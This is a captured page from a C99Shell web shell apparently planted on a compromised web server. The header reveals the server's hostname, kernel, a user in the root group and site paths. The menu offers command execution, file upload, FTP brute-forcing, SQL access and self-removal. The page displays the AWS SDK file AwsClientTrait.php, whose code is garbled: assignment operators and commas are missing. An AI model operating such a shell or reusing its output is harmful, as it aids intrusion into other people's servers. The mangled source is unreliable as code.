!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/   drwxr-xr-x
Free 28.49 GB of 117.98 GB (24.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AwsClientTrait.php (2.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws;

use 
Aws\Api\Service;

/**
 * A trait providing generic functionality for interacting with Amazon Web
 * Services. This is meant to be used in classes implementing
 * \Aws\AwsClientInterface
 */
trait AwsClientTrait
{
    public function 
getPaginator($name, array $args = [])
    {
        
$config $this->getApi()->getPaginatorConfig($name);

        return new 
ResultPaginator($this$name$args$config);
    }

    public function 
getIterator($name, array $args = [])
    {
        
$config $this->getApi()->getPaginatorConfig($name);
        if (!
$config['result_key']) {
            throw new 
\UnexpectedValueException(sprintf(
                
'There are no resources to iterate for the %s operation of %s',
                
$name$this->getApi()['serviceFullName']
            ));
        }

        
$key is_array($config['result_key'])
            ? 
$config['result_key'][0]
            : 
$config['result_key'];

        if (
$config['output_token'] && $config['input_token']) {
            return 
$this->getPaginator($name$args)->search($key);
        }

        
$result $this->execute($this->getCommand($name$args))->search($key);

        return new 
\ArrayIterator((array) $result);
    }

    public function 
waitUntil($name, array $args = [])
    {
        return 
$this->getWaiter($name$args)->promise()->wait();
    }

    public function 
getWaiter($name, array $args = [])
    {
        
$config = isset($args['@waiter']) ? $args['@waiter'] : [];
        
$config += $this->getApi()->getWaiterConfig($name);

        return new 
Waiter($this$name$args$config);
    }

    public function 
execute(CommandInterface $command)
    {
        return 
$this->executeAsync($command)->wait();
    }

    public function 
executeAsync(CommandInterface $command)
    {
        
$handler $command->getHandlerList()->resolve();
        return 
$handler($command);
    }

    public function 
__call($name, array $args)
    {
        if (
substr($name, -5) === 'Async') {
            
$name substr($name0, -5);
            
$isAsync true;
        }

        if (!empty(
$this->aliases[ucfirst($name)])) {
            
$name $this->aliases[ucfirst($name)];
        }

        
$params = isset($args[0]) ? $args[0] : [];

        if (!empty(
$isAsync)) {
            return 
$this->executeAsync(
                
$this->getCommand($name$params)
            );
        }

        return 
$this->execute($this->getCommand($name$params));
    }

    
/**
     * @param string $name
     * @param array $args
     *
     * @return CommandInterface
     */
    
abstract public function getCommand($name, array $args = []);

    
/**
     * @return Service
     */
    
abstract public function getApi();
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--